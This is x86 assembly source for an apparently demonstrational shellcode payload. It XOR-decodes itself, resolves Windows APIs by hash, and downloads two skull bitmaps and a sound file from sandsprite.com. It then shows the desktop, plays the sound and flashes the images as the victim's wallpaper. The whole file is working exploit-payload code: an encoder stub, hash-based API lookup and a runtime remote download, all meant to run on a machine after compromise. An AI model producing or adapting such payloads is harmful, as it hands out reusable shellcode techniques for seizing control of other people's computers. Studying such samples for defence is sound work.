[BITS 32]
[ORG 0]
	
;-------------- offsets into our api table..
GlobalAlloc              equ 0
LoadLibraryA             equ 4 
URLDownloadToCacheFileA  equ 8
keybd_event              equ 12
sndPlaySoundA            equ 16 
SystemParametersInfoA    equ 20
Sleep                    equ 24
ExitProcess              equ 28


  jmp over_encoder

to_encoder:
  pop eax
  xor ecx, ecx
  mov cx, word fname3 - over_encoder +5
decode_loop:
  xor byte [eax], 0xCC
  inc eax
  loopnz decode_loop
  jmp decoded

over_encoder:
  call to_encoder   ; uncomment this if you want to use xor encoder portion...

decoded:

  cld			     ; clear the direction flag
  call start		 ; call start, this pushes the address of 'api_call' onto the stack
delta:
%include "./x86_api_lookup.asm" 
start:
  pop ebp		  
  
;-------------------------------build our api table

  push 0x00000000  ; end of api...
  push 0x56A2B5F0	 ; ExitProcess
  push 0xE035F044	 ; Sleep
  push 0xCE623E60  ; SystemParametersInfoA  
  push 0x79C30844  ; sndPlaySoundA 
  push 0xE40DF124	 ; keybd_event
  push 0xDAC0C98F  ; URLDownloadToCacheFileA
  push 0x0726774C  ; LoadLibraryA 
  push 0x520F76F6	 ; GlobalAlloc

  call ebp
  mov esi, eax

  push 40	      ; dwBytes   (allocate our api pointer block..)
  push 0	      ; wFlags 
  call eax        ; global alloc

  lea edi, [ebp+api_block-delta]
  mov [edi], eax  ;store a pointer to the alloc in api_block
  mov edi, eax

  mov [edi], esi  ;store GlobalAlloc as first element in apiblock
  add edi, 4
  call ebp
  mov [edi], eax  ;store LoadLibrary api as second element in apiblock..
  mov esi, eax

  ;now we have to load the rest of the dlls...

  lea eax, [ebp+dll1-delta]       ;
  push eax
  call esi

  lea eax, [ebp+dll2-delta]       ;
  push eax
  call esi

  lea eax, [ebp+dll3-delta] 
  push eax
  call esi

  ; now we can load the rest of the api...

load_api_loop: 
  add edi, 4
  cmp [esp], dword 0
  jz out_of_api_loop
  call ebp
  mov [edi], eax
  jmp load_api_loop

out_of_api_loop:
    
;------------------------------------Alloc Section for download File paths

  lea edi, [ebp+api_block-delta] ;get the pointer to api table..
  mov edi, [edi]                 ;load the address of the table itself

  push 256	      ;  dwBytes
  push 0	      ;  wFlags 
  call [edi+GlobalAlloc]

  lea ebx, [ebp+fname1-delta] 
  mov [ebx], eax

  push 256	      ;  dwBytes
  push 0	      ;  wFlags 
  call [edi+GlobalAlloc]

  lea ebx, [ebp+fname2-delta] 
  mov [ebx], eax

  push 256	      ;  dwBytes
  push 0	      ;  wFlags 
  call [edi+GlobalAlloc]

  lea ebx, [ebp+fname3-delta] 
  mov [ebx], eax

;------------------------------------ File downloads (~60k)

  lea eax, [ebp+url-delta] 
  lea ebx, [ebp+fname1-delta] 
  mov ebx, [ebx]
  
  push 0             ;IBindStatusCallback
  push 0             ;dwReserved
  push 260           ;dwBufLength
  push ebx           ;szFileName
  push eax           ;szURL
  push 0             ;lpUnkcaller
  call [edi+URLDownloadToCacheFileA]
  
  cmp eax, 0
  jnz failed

  lea eax, [ebp+url2-delta] 
  lea ebx, [ebp+fname2-delta] 
  mov ebx, [ebx]

  push 0             ;IBindStatusCallback
  push 0             ;dwReserved
  push 260           ;dwBufLength
  push ebx           ;szFileName
  push eax           ;szURL
  push 0             ;lpUnkcaller
  call [edi+URLDownloadToCacheFileA]
  
  cmp eax, 0
  jnz failed

  lea eax, [ebp+url3-delta] 
  lea ebx, [ebp+fname3-delta] 
  mov ebx, [ebx]

  push 0             ;IBindStatusCallback
  push 0             ;dwReserved
  push 260           ;dwBufLength
  push ebx           ;szFileName
  push eax           ;szURL
  push 0             ;lpUnkcaller
  call [edi+URLDownloadToCacheFileA]
  
  cmp eax, 0
  jnz failed
  
;-------------------------------------- Show desktop code

  push 0	;  dwExtraInfo As Long)
  push 1	;  dwFlags As Long     KEYEVENTF_EXTENDEDKEY
  push 0	;  bScan As Byte
  push 0x5b	; (bVk As Byte         VK_LWIN
  call [edi+keybd_event]

  push 0	;  dwExtraInfo As Long)
  push 0	;  dwFlags As Long
  push 0	;  bScan As Byte
  push 'D'	; (bVk As Byte
  call [edi+keybd_event]

  push 0	;  dwExtraInfo As Long)
  push 3	;  dwFlags As Long       KEYEVENTF_EXTENDEDKEY Or KEYEVENTF_KEYUP
  push 0	;  bScan As Byte
  push 0x5b	; (bVk As Byte
  call [edi+keybd_event]

  push 0	;  dwExtraInfo As Long)
  push 2	;  dwFlags As Long
  push 0	;  bScan As Byte
  push 'D'	; (bVk As Byte
  call [edi+keybd_event]

;-------------------------------------- demo commences

  lea eax, [ebp+fname3-delta] 
  mov eax, [eax]
  push 1             ; flags = snd_async
  push eax           ; path
  call [edi+sndPlaySoundA]

  mov esi, 4   ;loop count

animation_loop:

  lea eax, [ebp+fname1-delta] 
  mov eax, [eax]
   
  push 0              ;fuWinIni
  push eax            ;lpvParam
  push 0              ;uParam
  push 20d            ;uAction (SPI_SETDESKWALLPAPER)
  call [edi+SystemParametersInfoA]

  dec esi
  cmp esi, 0
  jz animation_complete

  push 300	; (dwMilliseconds As Long)
  call [edi+Sleep]  ; Sleep

  lea eax, [ebp+fname2-delta] 
  mov eax, [eax]
   
  push 0              ;fuWinIni
  push eax            ;lpvParam
  push 0              ;uParam
  push 20d            ;uAction (SPI_SETDESKWALLPAPER)
  call [edi+SystemParametersInfoA]

  push 300	; (dwMilliseconds As Long)
  call [edi+Sleep]  ; Sleep
  
  jmp animation_loop

animation_complete:

  push 1200	      ; (dwMilliseconds As Long)
  call [edi+Sleep]        ;Sleep

  push 0              ;fuWinIni
  push 0              ;lpvParam
  push 0              ;uParam
  push 20d            ;uAction (SPI_SETDESKWALLPAPER)
  call [edi+SystemParametersInfoA]

failed:
  push byte 0		  
  call [edi+ExitProcess]
  	  
api_block: dd 0

url:  db "http://sandsprite.com/skull.bmp",0 ; must be a bitmap  
url2: db "http://sandsprite.com/skull2.bmp",0   
url3: db "http://sandsprite.com/monster.wav",0   

dll1: db "WINMM.DLL",0
dll2: db "user32.dll",0
dll3: db "urlmon.dll",0

fname1: dd 0
fname2: dd 0
fname3: dd 0




